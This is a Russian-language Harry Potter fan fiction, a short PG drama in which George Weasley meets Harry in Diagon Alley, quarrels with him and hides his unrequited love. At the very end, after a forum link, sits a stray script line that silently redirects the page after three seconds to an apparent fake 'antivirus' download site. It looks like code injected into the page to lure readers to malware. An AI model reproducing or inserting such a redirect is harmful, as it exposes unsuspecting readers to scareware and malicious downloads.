Солнышко косого переулка

Автор: Ungolianta
Бета: merry_dancers
Жанр: драма
Рейтинг: PG
Дисклеймер: герои приналежат Роулинг
Пейринг: ДУ/ГП
Саммари: маленькая встреча может обновить душевные муки, особенно если при этой встрече ты ведешь себя не так, как хотел…

 Я шел по Косому переулку. Один, как ни странно. Я редко хожу один — обычно мы с Фредом всегда вдвоем, как зеркальное отражение друг друга: так и жить спокойнее, и поговорить всегда есть с кем…

 Но не сейчас.

 Сейчас я шел совершенно один, и мне это нравилось, потому что чье-либо общество мне бы сейчас только помешало.

 Говорить не хотелось ни с кем.

 Я думал о нем.

 Где-то на уровне подсознания я, наверное, хотел его встретить тут… Что было бы маловероятно – посередине учебного года он не выходит из школы, зачем ему это надо.

 Я не знал, что когда очень сильно чего-то хочешь, оно может материализоваться.

 Замороченный своей бурной и сумасшедшей жизнью, я не сразу заметил, как мои гормоны все-таки взяли свое, и на исходе девятнадцати лет я в первый раз полюбил. Я даже не сразу это понял – столько было дел. Я постоянно мотался с братом по стране, торгуя всякой ерундою... Тогда она мне ерундой не казалось. Это потом я понял, что все эта торговля, все эти чертовы деньги – это совсем не главное в жизни…

 Зато брат сразу же понял мое настроение.

 Он заметил где-то в глубине моей души зарождавшееся чувство к этому мальчику и смог поднять его наверх, наружу. И я понял, что люблю его.

 А он…

 А кто знает, что он испытывал ко мне? Мы с Фредом ни у кого никогда не вызывали серьезных чувств: наверное, мы сами в этом виноваты. Мы показывали себя слишком легкомысленными.

 И он тоже смотрел на меня всегда с улыбкой, просто как на старшего брата своего друга. Как на какое-то развлечение. Ходячий телевизор. Говорящая книга с комиксами.

 Где же сейчас мое солнышко?

 Да, умом я понимал, что его тут не может сейчас быть… Что он сейчас где-то далеко, учится со своими друзьями или отдыхает с ними же, и вряд ли вспоминает обо мне. Да что там, с чего ему обо мне вспоминать: я – совсем не главный человек в его жизни. Есть и другие, более значимые, которые сейчас рядом с ним. А я слишком далеко…

 Перед глазами невольно вставали эти дурацкие образы, которые я пытался отогнать всеми силами. Темные пряди, зеленые глаза, похожие на изумруды – в каждом краешке которых отражается солнце… Этот изгиб бровей… Наваждение.

 И вот я увидел, что он идет ко мне навстречу.

 То, о чем я только что думал – этот образ, мысленно стоящий у меня перед глазами, внезапно обрел физическое воплощение.

 Он меня еще не заметил – шел и смотрел в витрины магазинов. Как странно, что он делает здесь посередине учебного года?

 Сердце вздрогнуло и забилось под горлом. Он меня заметил.

 В ту же секунду его губы растянулись в улыбке. Он сменила направление и, проигнорировав магазин, в который направлялся, подошел ко мне.

 - Джордж? – в его голосе прозвучало еле заметное изумление. – Ты здесь? Я думал… ты в Ирландии…

Здравствуй, - я попытался вести себя как можно более естественно. – Мы с Фредом приехали сюда, чтобы забрать кое-что из нашего магазина…

 - С Фредом? – перебил он. – А где Фред? Почему ты один?

 «Где Фред?» - при этих словах меня охватила безмерная злоба.

 Какая ему разница – где Фред? Или он хочет его видеть больше, чем меня?

Он… Скоро подойдет, - неохотно ответил я.

 - Ясно…

А что здесь делаешь ты? – не удержался я.

 Гарри потеребил в пальцах свой гриффиндорский галстук. Он была в форме.

 Да, когда-то и у меня была такая форма.

 - Я забыл кое-что купить… - Мне показалось, что он смутилась при этих словах: его щеки еле заметно вспыхнули.

Конечно, как же может Гарри Поттер что-то забыть, да еще и по учебе.

Снейп заставил меня приехать сюда прямо посередине учебной недели, представляешь?

Представляю, - я помолчал. – Глупость какая, - снова не удержался я от колкости.

Что глупость? – он удивленно распахнул ресницы.

 Мой чертов язык уже понесся по любимой стезе: издеваться над теми, кто беспрекословно подчиняется школьным правилам и не мыслит себя без их соблюдения. Я не смог вовремя остановиться. Это было моей фатальной ошибкой.

Глупость – вот так вот взять и послушаться Снейпа, - усмехнулся я. – Мог бы хоть раз наплевать на его слова. Неужели тебе так важно, что он тебе скажет? И ради какой-то паршивой оценки надо нестись по магазинам?

 Его щеки теперь уже покраснели в полную силу. Зрачки сузились.

Джордж, - спокойно сказал он, - если тебе в свое время было наплевать на учебу – это не значит, что к ней так же относятся и все. Мы беспокоимся о статусе нашего факультета.

 - Ну нельзя же отдавать этой учебе всего себя!

 Я зачем-то вступил с ним в спор. Никому не нужный, неуместный спор. Наверное, во мне заговорила моя мародерская сущность. Хотелось просто как-то показать себя – что я такой вот свободный и независимый, а он – просто ученик, честный и ответственный, гордость Дамблдора.

 Зачем?

 Просто ребячество…

Я и не отдаю себя всего учебе, - я увидел, как он стиснула зубы.

 Наверное, ей было обидно слышать – ведь он не любим Снейпа, а я фактически назвал его учительским подхалимом.

Я, - продолжил он, - кроме учебы еще занимаюсь многими вещами с Роном и Гермионой…

 С моих губ сорвался нервный смешок.

 Я тут же понял, что смешок получился пошлым.

Что? – тихо спросил он. – Ты на что намекаешь? Мы просто друзья!

 Я прижал ладони к груди.

Конечно, конечно, друзья!

 - Джордж, - сквозь зубы проговорил он, сжав кулачки и глядя исподлобья мне в глаза. – Запомни раз и навсегда: мы с Гермионой и Роном – просто друзья, и единственное, что мы делаем в школе – это учимся! Не знаю, чем по жизни занимаешься ТЫ, но, судя по тому, что ты постоянно катаешься по миру и заводишь себе тут и там девушек – я понимаю, почему ты воспринимаешь всех людей такими же испорченными, как ты сам! Подумай над этим и постарайся что-то изменить в своем характере, пока все твои девушки не сделали это сами! Не каждая будет терпеть такое обращение! До свидания!

 Выпалив на одном дыхании эту тираду, он развернулся на каблуках и пошел в противоположную от меня сторону, гордо выпрямив спину.

 Солнышко…

 От безысходности и грусти я почувствовал, как на глаза у меня наворачиваются слезы, а в носу противно защипало. Я сделал вид, что зевнул, и часто заморгал – слезы исчезли под веками.

 Ты парень, ты сильный. Ты не должен плакать. Это удел слабых.

Что с тобой? – обеспокоено спросил подошедший Фред.

 Я мог бы поспорить, что он прекрасно знает, что со мной. Он спросил просто так, чтобы я не чувствовал себя совсем покинутым. Да, брат всегда понимал, что творится у меня в душе.

Ты же прекрасно знаешь.

 - Да, я знаю.

 Фред отвел глаза на несколько секунд. Потом с усилием выдохнул и сказал:

 - Пойдем. Нам пора.

Пойдем.

 И мы зашагали по Косому переулку, вымощенному маленькими гладкими камушками. Мне почему-то подумалось, что по ним очень приятно ходить босиком: они нагреваются на солнце и приятно щекочут ступни.

 Я оглянулся.

 Его уже не было.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>